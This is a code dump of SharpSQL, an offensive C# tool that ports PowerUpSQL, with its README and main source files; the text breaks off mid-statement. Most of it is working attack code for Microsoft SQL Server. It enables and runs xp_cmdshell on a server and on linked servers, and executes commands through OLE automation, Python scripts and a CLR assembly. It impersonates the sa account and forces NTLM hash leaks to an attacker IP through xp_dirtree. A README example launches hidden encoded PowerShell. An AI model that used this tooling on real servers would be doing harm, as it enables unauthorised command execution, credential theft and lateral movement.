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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SharpSQL 2 | 3 | Simple port of PowerUpSQL 4 | - Methods and options are case-insensitive e.g. `Get-SQLInstanceDomain`/`get-sqlinstancedomain` or `-Instance`/`-instance` 5 | - `-Instance` required for all methods except `Get-SQLInstanceDomain` 6 | 7 | Thanks to [tevora-threat](https://github.com/tevora-threat) for getting the ball rolling. 8 | 9 |
10 | 11 | ## Usage 12 | ``` 13 | SharpSQL by @mlcsec 14 | 15 | Usage: 16 | 17 | SharpSQL.exe [Method] [-Instance ] [-LinkedInstance ] [-Command ] [-Query ] 18 | 19 | Options: 20 | 21 | -Instance - The instance to taget 22 | -db - The db to connect to (default: master) 23 | -LinkedInstance - The linked instance to target 24 | -ip - The IP to xp_dirtree (share: /pwn) 25 | -User - The user to impersonate 26 | -Command - The command to execute (default: whoami - Invoke-OSCmd, Invoke-LinkedOSCmd, Invoke-ExternalScript, and Invoke-OLEObject) 27 | -Query - The raw SQL query to execute 28 | -help - Show help 29 | 30 | Methods: 31 | Get-SQLInstanceDomain - Get SQL instances within current domain via user and computer SPNs (no parameters required) 32 | Get-Databases - Get available databases 33 | Get-DBUser - Get database user via USER_NAME 34 | Get-GroupMembership - Get group member for current user ('guest' or 'sysadmin') 35 | Get-Hash - Get hash via xp_dirtree, works nicely with impacket-ntlmrelayx 36 | Get-ImpersonableUsers - Get impersonable users 37 | Get-LinkedServers - Get linked SQL servers 38 | Get-LinkedPrivs - Get current user privs for linked server 39 | Get-Sysadmins - Get sysadmin users 40 | Get-SystemUser - Get system user via SYSTEM_USER 41 | Get-SQLQuery - Execute raw SQL query 42 | Get-Triggers - Get SQL server triggers 43 | Get-Users - Get users from syslogins 44 | Get-UserPrivs - Get current user server privileges 45 | Check-Cmdshell - Check whether xp_cmdshell is enabled on instance 46 | Check-LinkedCmdshell - Check whether xp_cmdshell is enabled on linked server 47 | Clear-CLRAsm - Drop procedure and assembly (run before Invoke-CLRAsm if previous error) 48 | Enable-Cmdshell - Enable xp_cmdshell on instance 49 | Enable-LinkedCmdshell - Enable xp_cmdshell on linked server 50 | Invoke-OSCmd - Invoke xp_cmdshell on instance 51 | Invoke-LinkedOSCmd - Invoke xp_cmdshell on linked server 52 | Invoke-ExternalScript - Invoke external python script command execution 53 | Invoke-OLEObject - Invoke OLE wscript command execution 54 | Invoke-CLRAsm - Invoke CLR assembly procedure command execution 55 | Invoke-UserImpersonation - Impersonate user and execute query 56 | Invoke-DBOImpersonation - Impersonate dbo on msdb and execute query 57 | 58 | Examples: 59 | 60 | SharpSQL.exe Get-SQLInstanceDomain 61 | SharpSQL.exe Get-UserPrivs -Instance sql.server 62 | SharpSQL.exe Get-Sysadmins -Instance sql.server 63 | SharpSQL.exe Get-LinkedServers -Instance sql.server 64 | SharpSQL.exe Get-Hash -Instance sql.server -ip 10.10.10.10 65 | SharpSQL.exe Invoke-OSCmd -Instance sql.server -Command "whoami /all" 66 | SharpSQL.exe Invoke-LinkedOSCmd -Instance sql.server -LinkedInstance linked.sql.server -Command "dir C:\users\" 67 | SharpSQL.exe Invoke-CLRAsm -Instance sql.server -Command "whoami && ipconfig" 68 | ``` 69 | 70 |
71 | 72 | ## Demos and Examples 73 | ### Get-GroupMembership 74 | ![image](https://user-images.githubusercontent.com/47215311/153180706-78e2a53c-79fb-4db0-ba03-cda16d476966.png) 75 | 76 | ### Get-SQLquery 77 | ![image](https://user-images.githubusercontent.com/47215311/153181678-6d61bb45-ff9b-4451-93ff-9497ab875bc5.png) 78 | 79 | ### Get-UserPrivs 80 | ![image](https://user-images.githubusercontent.com/47215311/153054239-3937a19a-5514-42fb-980c-4e1676f085ca.png) 81 | 82 | ### Invoke-OSCmd 83 | ![image](https://user-images.githubusercontent.com/47215311/153182593-e40747ff-b9f1-4ed4-a634-556f37e617ea.png) 84 | 85 | ### OLE Object via Impersonation 86 | ``` 87 | .\SharpSQL.exe invoke-userimpersonation -instance dc01 -user sa -Query "EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'powershell -exec bypass -nop -w hidden -enc blahblah';" 88 | ``` 89 | 90 | ### Impersonation and xp_cmdshell 91 | ``` 92 | .\SharpSQL.exe invoke-userimpersonation -instance dc01 -user sa -Query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;" 93 | 94 | .\SharpSQL.exe invoke-userimpersonation -instance dc01 -user sa -Query "EXEC xp_cmdshell 'whoami'" 95 | ``` 96 | 97 | ### Command execution via CLR Assembly 98 | ``` 99 | .\SharpSQL.exe Invoke-clrasm -instance sql01 -command "cd && ipconfig" 100 | [*] Authenticated to: sql01 101 | [*] Invoke-CLRAsm: 102 | C:\Windows\system32 103 | 104 | Windows IP Configuration 105 | 106 | 107 | Ethernet adapter Ethernet0: 108 | 109 | Connection-specific DNS Suffix . : 110 | IPv4 Address. . . . . . . . . . . : 192.168.168.5 111 | Subnet Mask . . . . . . . . . . . : 255.255.255.0 112 | Default Gateway . . . . . . . . . : 192.168.168.254 113 | ``` 114 | The following template is currently used for the custom CLR assembly: 115 | ```c# 116 | using System; 117 | using Microsoft.SqlServer.Server; 118 | using System.Data.SqlTypes; 119 | using System.Diagnostics; 120 | 121 | public class ClassLibrary1 122 | { 123 | [Microsoft.SqlServer.Server.SqlProcedure] 124 | public static void cmdExec(SqlString execCommand) 125 | { 126 | Process proc = new Process(); 127 | proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; 128 | proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand); 129 | proc.StartInfo.UseShellExecute = false; 130 | proc.StartInfo.RedirectStandardOutput = true; 131 | proc.Start(); 132 | 133 | SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", System.Data.SqlDbType.NVarChar, 4000)); 134 | SqlContext.Pipe.SendResultsStart(record); 135 | record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); 136 | SqlContext.Pipe.SendResultsRow(record); 137 | SqlContext.Pipe.SendResultsEnd(); 138 | 139 | proc.WaitForExit(); 140 | proc.Close(); 141 | } 142 | } 143 | ``` 144 | The method automatically deletes the created procedure and assembly after each invocation. However, if an error occurs you may have to clear this before the next call by using `Clear-CLRAsm`. 145 | 146 | 147 | 148 |
149 | 150 | 151 | 152 | ## Todo 153 | 154 | - Test: 155 | - `Invoke-ExternalScript` - not tested in lab 156 | 157 | - Fix: 158 | - `Enable-LinkedCmdshell` - rpc or metadata error currently, `Check-LinkedCmdshell` and `Invoke-LinkedOSCmd` work fine 159 | 160 | - Add: 161 | - `Add-User` 162 | - `Add-LinkedUser` 163 | - `Enable-RPC` - on instance and linkedinstance, allows for EXEC... AT... 164 | - double link crawl functionality, raw queries should work as is 165 | -------------------------------------------------------------------------------- /SharpSQL/Config.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | 5 | namespace SharpSQL 6 | { 7 | class Config 8 | { 9 | public static string instance = ""; 10 | public static string ip = ""; 11 | public static string db = "master"; 12 | public static string linkedinstance = ""; 13 | public static string user = ""; 14 | public static string command = "whoami"; 15 | public static string query = ""; 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /SharpSQL/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text.RegularExpressions; 5 | using System.Data.SqlClient; 6 | using System.DirectoryServices; 7 | using System.DirectoryServices.AccountManagement; 8 | 9 | 10 | namespace SharpSQL 11 | { 12 | class Program 13 | { 14 | public static void ShowHelp() 15 | { 16 | Console.WriteLine( 17 | @" 18 | SharpSQL by @mlcsec 19 | 20 | Usage: 21 | 22 | SharpSQL.exe [Method] [-Instance ] [-LinkedInstance ] [-Command ] [-Query ] 23 | 24 | Options: 25 | 26 | -Instance - The instance to taget 27 | -db - The db to connect to (default: master) 28 | -LinkedInstance - The linked instance to target 29 | -ip - The IP to xp_dirtree (share: /pwn) 30 | -User - The user to impersonate 31 | -Command - The command to execute (default: whoami - Invoke-OSCmd, Invoke-LinkedOSCmd, Invoke-ExternalScript, and Invoke-OLEObject) 32 | -Query - The raw SQL query to execute 33 | -help - Show help 34 | 35 | Methods: 36 | Get-SQLInstanceDomain - Get SQL instances within current domain via user and computer SPNs (no parameters required) 37 | Get-Databases - Get available databases 38 | Get-DBUser - Get database user via USER_NAME 39 | Get-GroupMembership - Get group member for current user ('guest' or 'sysadmin') 40 | Get-Hash - Get hash via xp_dirtree, works nicely with impacket-ntlmrelayx 41 | Get-ImpersonableUsers - Get impersonable users 42 | Get-LinkedServers - Get linked SQL servers 43 | Get-LinkedPrivs - Get current user privs for linked server 44 | Get-Sysadmins - Get sysadmin users 45 | Get-SystemUser - Get system user via SYSTEM_USER 46 | Get-SQLQuery - Execute raw SQL query 47 | Get-Triggers - Get SQL server triggers 48 | Get-Users - Get users from syslogins 49 | Get-UserPrivs - Get current user server privileges 50 | Check-Cmdshell - Check whether xp_cmdshell is enabled on instance 51 | Check-LinkedCmdshell - Check whether xp_cmdshell is enabled on linked server 52 | Clear-CLRAsm - Drop procedure and assembly (run before Invoke-CLRAsm if previous error) 53 | Enable-Cmdshell - Enable xp_cmdshell on instance 54 | Enable-LinkedCmdshell - Enable xp_cmdshell on linked server 55 | Invoke-OSCmd - Invoke xp_cmdshell on instance 56 | Invoke-LinkedOSCmd - Invoke xp_cmdshell on linked server 57 | Invoke-ExternalScript - Invoke external python script command execution 58 | Invoke-OLEObject - Invoke OLE wscript command execution 59 | Invoke-CLRAsm - Invoke CLR assembly procedure command execution 60 | Invoke-UserImpersonation - Impersonate user and execute query 61 | Invoke-DBOImpersonation - Impersonate dbo on msdb and execute query 62 | 63 | Examples: 64 | 65 | SharpSQL.exe Get-SQLInstanceDomain 66 | SharpSQL.exe Get-UserPrivs -Instance sql.server 67 | SharpSQL.exe Get-Sysadmins -Instance sql.server 68 | SharpSQL.exe Get-LinkedServers -Instance sql.server 69 | SharpSQL.exe Get-Hash -Instance sql.server -ip 10.10.10.10 70 | SharpSQL.exe Invoke-OSCmd -Instance sql.server -Command ""whoami /all"" 71 | SharpSQL.exe Invoke-LinkedOSCmd -Instance sql.server -LinkedInstance linked.sql.server -Command ""dir C:\users\"" 72 | SharpSQL.exe Invoke-CLRAsm -Instance sql.server -Command ""whoami && ipconfig"" 73 | "); 74 | } 75 | 76 | static void ParseArgs(string[] args) 77 | { 78 | 79 | int iter = 0; 80 | 81 | foreach (string item in args) 82 | { 83 | switch (item) 84 | { 85 | case "-Instance": 86 | case "-instance": 87 | Config.instance = args[iter + 1]; 88 | break; 89 | case "-ip": 90 | Config.ip = args[iter + 1]; 91 | break; 92 | case "-db": 93 | Config.db = args[iter + 1]; 94 | break; 95 | case "-LinkedInstance": 96 | case "-linkedinstance": 97 | Config.linkedinstance = args[iter + 1]; 98 | break; 99 | case "-User": 100 | case "-user": 101 | Config.user = args[iter + 1]; 102 | break; 103 | case "-Command": 104 | case "-command": 105 | Config.command = args[iter + 1]; 106 | break; 107 | case "-Query": 108 | case "-query": 109 | Config.query = args[iter + 1]; 110 | break; 111 | default: 112 | break; 113 | } 114 | ++iter; 115 | } 116 | } 117 | 118 | 119 | public static String executeQuery(String query, SqlConnection con) 120 | { 121 | SqlCommand cmd = new SqlCommand(query, con); 122 | SqlDataReader reader = cmd.ExecuteReader(); 123 | 124 | try 125 | { 126 | String result = ""; 127 | while (reader.Read() == true) 128 | { 129 | result += reader[0] + "\n"; 130 | } 131 | reader.Close(); 132 | return result; 133 | } 134 | catch 135 | { 136 | return ""; 137 | } 138 | } 139 | 140 | 141 | 142 | public static void getGroupMembership(String groupToCheck, SqlConnection con) 143 | { 144 | String query = executeQuery($"SELECT IS_SRVROLEMEMBER('{groupToCheck}');", con); 145 | int role = int.Parse(query); 146 | 147 | if (role == 1) 148 | { 149 | Console.WriteLine($"'{groupToCheck}' group member"); 150 | } 151 | else 152 | { 153 | Console.WriteLine($"not '{groupToCheck}' group member"); 154 | } 155 | } 156 | 157 | 158 | 159 | public static void GetSQLInstanceDomain() 160 | { 161 | string[] spns = { }; 162 | List list = new List(spns.ToList()); 163 | using (var context = new PrincipalContext(ContextType.Domain)) 164 | { 165 | using (var searcher = new PrincipalSearcher(new ComputerPrincipal(context))) 166 | { 167 | foreach (var result in searcher.FindAll()) 168 | { 169 | DirectoryEntry de = result.GetUnderlyingObject() as DirectoryEntry; 170 | foreach (string spn in de.Properties["serviceprincipalname"]) 171 | { 172 | Match cont = Regex.Match(spn, "MSSQL"); 173 | if (cont.Success) 174 | { 175 | list.Add(spn); 176 | } 177 | } 178 | } 179 | } 180 | } 181 | 182 | using (var context = new PrincipalContext(ContextType.Domain)) 183 | { 184 | using (var searcher = new PrincipalSearcher(new UserPrincipal(context))) 185 | { 186 | foreach (var result in searcher.FindAll()) 187 | { 188 | DirectoryEntry de = result.GetUnderlyingObject() as DirectoryEntry; 189 | foreach (string spn in de.Properties["serviceprincipalname"]) 190 | { 191 | Match cont = Regex.Match(spn, "MSSQL"); 192 | if (cont.Success) 193 | { 194 | list.Add(spn); 195 | } 196 | } 197 | } 198 | } 199 | } 200 | 201 | spns = list.ToArray(); 202 | Console.WriteLine("[*] Get-SQLInstanceDomain: "); 203 | foreach (var i in spns) 204 | { 205 | Console.WriteLine(i); 206 | } 207 | } 208 | 209 | 210 | 211 | static void Main(string[] args) 212 | { 213 | 214 | if (args.Length < 1) 215 | { 216 | ShowHelp(); 217 | return; 218 | } 219 | 220 | if (args.Contains("-help")) 221 | { 222 | ShowHelp(); 223 | return; 224 | } 225 | 226 | ParseArgs(args); 227 | 228 | 229 | string command = args[0]; 230 | if (string.Equals(command, "Get-SQLInstanceDomain", StringComparison.CurrentCultureIgnoreCase)) 231 | { 232 | GetSQLInstanceDomain(); 233 | Environment.Exit(0); 234 | } 235 | 236 | 237 | if (string.IsNullOrEmpty(Config.instance)) 238 | { 239 | Console.WriteLine("[!] No SQL instance supplied!"); 240 | Environment.Exit(0); 241 | } 242 | 243 | 244 | string conStr = $"Server = {Config.instance}; Database = {Config.db}; Integrated Security = True;"; 245 | SqlConnection con = new SqlConnection(conStr); 246 | 247 | try 248 | { 249 | con.Open(); 250 | Console.WriteLine($"[*] Authenticated to: {Config.instance}"); 251 | } 252 | catch 253 | { 254 | Console.WriteLine($"[-] Authentication to: {Config.instance} failed"); 255 | System.Environment.Exit(0); 256 | } 257 | 258 | 259 | ///////////////////////////////////////////////////////////////////////////////////////////////////// 260 | // Enumeration 261 | 262 | if (string.Equals(command, "Get-Users", StringComparison.CurrentCultureIgnoreCase)) 263 | { 264 | string query = executeQuery("SELECT name FROM master..syslogins;", con); 265 | Console.WriteLine("[*] Get-Users: "); 266 | Console.WriteLine($"{query}"); 267 | } 268 | 269 | 270 | else if (string.Equals(command, "Get-SystemUser", StringComparison.CurrentCultureIgnoreCase)) 271 | { 272 | string query = executeQuery("SELECT SYSTEM_USER;", con); 273 | Console.WriteLine("[*] Get-SystemUser: "); 274 | Console.WriteLine($"{query}"); 275 | } 276 | 277 | 278 | else if (string.Equals(command, "Get-UserPrivs", StringComparison.CurrentCultureIgnoreCase)) 279 | { 280 | string query = executeQuery("SELECT permission_name FROM fn_my_permissions(NULL, 'SERVER');", con); 281 | Console.WriteLine("[*] Get-UserPrivs: "); 282 | Console.WriteLine($"{query}"); 283 | } 284 | 285 | 286 | else if (string.Equals(command, "Get-Triggers", StringComparison.CurrentCultureIgnoreCase)) 287 | { 288 | string query = executeQuery("SELECT name FROM sys.server_triggers;", con); 289 | Console.WriteLine("[*] Get-Triggers: "); 290 | // can then disable the trigger: "disable trigger on all server" 291 | Console.WriteLine($"{query}"); 292 | } 293 | 294 | 295 | 296 | else if (string.Equals(command, "Get-Sysadmins", StringComparison.CurrentCultureIgnoreCase)) 297 | { 298 | string query = executeQuery("SELECT name FROM master..syslogins WHERE sysadmin = '1';", con); 299 | Console.WriteLine("[*] Get-Sysadmins: "); 300 | Console.WriteLine($"{query}"); 301 | } 302 | 303 | 304 | else if (string.Equals(command, "Get-DBUser", StringComparison.CurrentCultureIgnoreCase)) 305 | { 306 | string query = executeQuery("SELECT USER_NAME();", con); 307 | Console.WriteLine("[*] Get-DBUser: "); 308 | Console.WriteLine($"{query}"); 309 | } 310 | 311 | 312 | else if (string.Equals(command, "Get-GroupMembership", StringComparison.CurrentCultureIgnoreCase)) 313 | { 314 | Console.WriteLine("[*] Get-GroupMembership: "); 315 | getGroupMembership("public", con); 316 | getGroupMembership("sysadmin", con); 317 | } 318 | 319 | 320 | else if (string.Equals(command, "Get-ImpersonableUsers", StringComparison.CurrentCultureIgnoreCase)) 321 | { 322 | string query = executeQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; ", con); 323 | Console.WriteLine("[*] Get-ImpersonableUsers: "); 324 | Console.WriteLine($"{query}"); 325 | } 326 | 327 | 328 | 329 | else if (string.Equals(command, "Get-LinkedServers", StringComparison.CurrentCultureIgnoreCase)) 330 | { 331 | string query = executeQuery("EXEC sp_linkedservers;", con); 332 | Console.WriteLine("[*] Get-LinkedServers: "); 333 | Console.WriteLine($"{query}"); 334 | } 335 | 336 | 337 | 338 | else if (string.Equals(command, "Get-Databases", StringComparison.CurrentCultureIgnoreCase)) 339 | { 340 | string query = executeQuery("SELECT * FROM sys.databases;", con); 341 | Console.WriteLine("[*] Get-Databases: "); 342 | Console.WriteLine($"{query}"); 343 | } 344 | 345 | 346 | else if (string.Equals(command, "Get-SQLQuery", StringComparison.CurrentCultureIgnoreCase)) 347 | { 348 | if (string.IsNullOrEmpty(Config.query)) 349 | { 350 | Console.WriteLine("[!] No query supplied!"); 351 | Console.WriteLine("SharpSQL.exe Get-SQLQurery -Instance sql.server -Query \"select @@servername\""); 352 | Environment.Exit(0); 353 | } 354 | else 355 | { 356 | string query = executeQuery($"{Config.query}", con); 357 | Console.WriteLine("[*] Get-SQLQuery: "); 358 | Console.WriteLine($"{query}"); 359 | } 360 | } 361 | 362 | 363 | 364 | else if (string.Equals(command, "Check-Cmdshell", StringComparison.CurrentCultureIgnoreCase)) 365 | { 366 | string query = executeQuery("SELECT value FROM sys.configurations WHERE name ='xp_cmdshell';", con); 367 | Console.WriteLine("[*] Check-Cmdshell: "); 368 | Console.WriteLine($"{query}"); 369 | } 370 | 371 | 372 | else if (string.Equals(command, "Check-LinkedCmdshell", StringComparison.CurrentCultureIgnoreCase)) 373 | { 374 | if (string.IsNullOrEmpty(Config.linkedinstance)) 375 | { 376 | Console.WriteLine("[!] No linked instance supplied!"); 377 | Console.WriteLine("Usage: SharpSQL.exe Check-LinkedCmdshell -Instance sql.server -LinkedInstance linked.sql.server"); 378 | Environment.Exit(0); 379 | } 380 | else 381 | { 382 | 383 | //string query = executeQuery($"EXEC ('SELECT value FROM sys.configurations WHERE name = ''xp_cmdshell''') AT [{Config.linkedinstance}];", con); // RPC fail 384 | string query = executeQuery($"SELECT * FROM OPENQUERY([{Config.linkedinstance}], 'SELECT value FROM sys.configurations WHERE name = ''xp_cmdshell''');", con); 385 | Console.WriteLine("[*] Check-LinkedCmdshell: "); 386 | Console.WriteLine($"{query}"); 387 | } 388 | } 389 | 390 | 391 | else if (string.Equals(command, "Get-LinkedPrivs", StringComparison.CurrentCultureIgnoreCase)) 392 | { 393 | if (string.IsNullOrEmpty(Config.linkedinstance)) 394 | { 395 | Console.WriteLine("[!] No linked instance supplied!"); 396 | Console.WriteLine("Usage: SharpSQL.exe Get-LinkedPrivs -Instance sql.server -LinkedInstance linked.sql.server"); 397 | Environment.Exit(0); 398 | } 399 | else 400 | { 401 | string query = executeQuery($"SELECT * FROM OPENQUERY([{Config.linkedinstance}], 'SELECT permission_name FROM fn_my_permissions(NULL, ''SERVER'')');", con); 402 | Console.WriteLine("[*] Get-LinkedPrivs: "); 403 | Console.WriteLine($"{query}"); 404 | } 405 | } 406 | 407 | 408 | else if (string.Equals(command, "Invoke-UserImpersonation", StringComparison.CurrentCultureIgnoreCase)) 409 | { 410 | if (string.IsNullOrEmpty(Config.user) || (string.IsNullOrEmpty(Config.query))) 411 | { 412 | Console.WriteLine("[!] No user or query supplied!"); 413 | Console.WriteLine("Usage: SharpSQL.exe Invoke-UserImpersonation -Instance sql.server -User sa -Query 'select user_name()'"); 414 | Environment.Exit(0); 415 | } 416 | 417 | else 418 | { 419 | string query = executeQuery($"EXECUTE AS LOGIN = '{Config.user}';", con); 420 | query = executeQuery($"{Config.query};", con); 421 | Console.WriteLine("[*] Invoke-UserImpersonation: "); 422 | Console.WriteLine($"{query}"); 423 | } 424 | } 425 | 426 | 427 | else if (string.Equals(command, "Invoke-DBOImpersonation", StringComparison.CurrentCultureIgnoreCase)) 428 | { 429 | if (string.IsNullOrEmpty(Config.query)) 430 | { 431 | Console.WriteLine("[!] No query supplied!"); 432 | Console.WriteLine("Usage: SharpSQL.exe Invoke-DBOImpersonation -Instance sql.server -Query 'select user_name()'"); 433 | Environment.Exit(0); 434 | } 435 | 436 | else 437 | { 438 | string query = executeQuery($"use msdb; EXECUTE AS USER = 'dbo';", con); 439 | query = executeQuery($"{Config.query};", con); 440 | Console.WriteLine("[*] Invoke-DBOImpersonation: "); 441 | Console.WriteLine($"{query}"); 442 | } 443 | } 444 | 445 | 446 | 447 | 448 | 449 | 450 | 451 | ///////////////////////////////////////////////////////////////////////////////////////////////////// 452 | // Code Execution 453 | 454 | 455 | else if (string.Equals(command, "Enable-Cmdshell", StringComparison.CurrentCultureIgnoreCase)) 456 | { 457 | string query = executeQuery("EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;", con); 458 | query = executeQuery($"EXEC xp_cmdshell 'whoami'", con); 459 | Console.WriteLine("[+] Enable-Cmdshell: "); 460 | Console.WriteLine($"{query}"); 461 | } 462 | 463 | 464 | 465 | else if (string.Equals(command, "Enable-LinkedCmdshell", StringComparison.CurrentCultureIgnoreCase)) 466 | { 467 | if (string.IsNullOrEmpty(Config.linkedinstance)) 468 | { 469 | Console.WriteLine("[!] No linked instance supplied!"); 470 | Console.WriteLine("Usage: SharpSQL.exe Enable-LinkedCmdshell -Instance sql.server -LinkedInstance linked.sql.server"); 471 | Environment.Exit(0); 472 | } 473 | else 474 | { 475 | string query = executeQuery($"EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT [{Config.linkedinstance}];", con); // if RPC error, enable RPC on remote server 476 | query = executeQuery($"EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [{Config.linkedinstance}];", con); 477 | query = executeQuery($"EXEC ('xp_cmdshell ''{Config.command}'';') AT [{Config.linkedinstance}];", con); 478 | 479 | //string query = executeQuery($"SELECT * FROM OPENQUERY([{Config.linkedinstance}], 'sp_configure ''show advanced options'', 1; reconfigure;');", con); // metadata error 480 | //query = executeQuery($"SELECT * FROM OPENQUERY([{Config.linkedinstance}], 'sp_configure ''xp_cmdshell'', 1; reconfigure;');", con); 481 | //query = executeQuery($"SELECT * FROM OPENQUERY([{Config.linkedinstance}], 'exec xp_cmdshell ''whoami'' WITH RESULT SETS ((output VARCHAR(MAX)))');", con); 482 | Console.WriteLine("[*] Enable-LinkedCmdshell: "); 483 | Console.WriteLine($"{query}"); 484 | } 485 | } 486 | 487 | 488 | 489 | else if (string.Equals(command, "Get-Hash", StringComparison.CurrentCultureIgnoreCase)) 490 | { 491 | if (string.IsNullOrEmpty(Config.ip)) 492 | { 493 | Console.WriteLine("[!] No ip supplied!"); 494 | Console.WriteLine("Usage: SharpSQL.exe Get-Hash -Instance sql.server -ip 10.10.10.10"); 495 | Environment.Exit(0); 496 | } 497 | else 498 | { 499 | string query = executeQuery($"EXEC master..xp_dirtree '\\\\{Config.ip}\\pwn', 1, 1;", con); 500 | Console.WriteLine("[*] Get-Hash"); 501 | Console.WriteLine($"[*] Check for hash at: {Config.ip}"); 502 | } 503 | } 504 | 505 | 506 | else if (string.Equals(command, "Invoke-ExternalScript", StringComparison.CurrentCultureIgnoreCase)) 507 | { 508 | string query = executeQuery("EXEC sp_configure 'external scripts enabled', 1; RECONFIGURE;", con); 509 | query = executeQuery($"EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system(\"{Config.command}\");';", con); 510 | Console.WriteLine("[*] Invoke-ExternalScript: "); 511 | Console.WriteLine($"{query}"); 512 | } 513 | 514 | 515 | //EXECUTE AS LOGIN = 'sa'; 516 | else if (string.Equals(command, "Invoke-OLEObject", StringComparison.CurrentCultureIgnoreCase)) 517 | { 518 | string query = executeQuery($"EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", con); 519 | query = executeQuery($"DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, '{Config.command}';", con); 520 | Console.WriteLine("[*] Invoke-OLEObject: "); 521 | Console.WriteLine($"{query}"); 522 | } 523 | 524 | 525 | else if (string.Equals(command, "Invoke-OSCmd", StringComparison.CurrentCultureIgnoreCase)) 526 | { 527 | string query = executeQuery($"EXEC master..xp_cmdshell '{Config.command}';", con); 528 | Console.WriteLine("[*] Invoke-OSCmd: "); 529 | Console.WriteLine($"{query}"); 530 | } 531 | 532 | 533 | else if (string.Equals(command, "Invoke-LinkedOSCmd", StringComparison.CurrentCultureIgnoreCase)) 534 | { 535 | if (string.IsNullOrEmpty(Config.linkedinstance)) 536 | { 537 | Console.WriteLine("[!] No linkedinstance supplied!"); 538 | Console.WriteLine("Usage: SharpSQL.exe Invoke-LinkedOSCmd -Instance sql.server -LinkedInstance linked.sql.server"); 539 | Environment.Exit(0); 540 | } 541 | else 542 | { 543 | //string query = executeQuery($"EXEC ('xp_cmdshell ''{Config.command}'';') AT [{Config.linkedinstance}];", con); // RPC fail 544 | string query = executeQuery($"SELECT * FROM OPENQUERY([{Config.linkedinstance}], 'exec xp_cmdshell ''{Config.command}'' WITH RESULT SETS ((output VARCHAR(MAX)))')", con); 545 | Console.WriteLine("[*] Invoke-LinkedOSCmd: "); 546 | Console.WriteLine($"{query}"); 547 | } 548 | } 549 | 550 | 551 | // EXECUTE AS LOGIN = 'sa' - need to remove this and add a Execue-AsUser function, or you can pth before 552 | else if (string.Equals(command, "Clear-CLRAsm", StringComparison.CurrentCultureIgnoreCase)) 553 | { 554 | string query = executeQuery($"EXECUTE AS LOGIN = 'sa'; use msdb; DROP PROCEDURE cmdExec; DROP ASSEMBLY custom_asm", con); 555 | Console.WriteLine("[*] Clear-CLRAsm: "); 556 | Console.WriteLine($"{query}"); 557 | } 558 | 559 | // EXECUTE AS LOGIN = 'sa' - need to remove this and add a Execue-AsUser function, or you can pth before 560 | else if (string.Equals(command, "Invoke-CLRAsm", StringComparison.CurrentCultureIgnoreCase)) 561 | { 562 | string query = executeQuery($"EXECUTE AS LOGIN = 'sa'; use msdb;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'clr enabled',1;RECONFIGURE;EXEC sp_configure 'clr strict security', 0;RECONFIGURE;", con); 563 | query = executeQuery("CREATE ASSEMBLY custom_asm FROM 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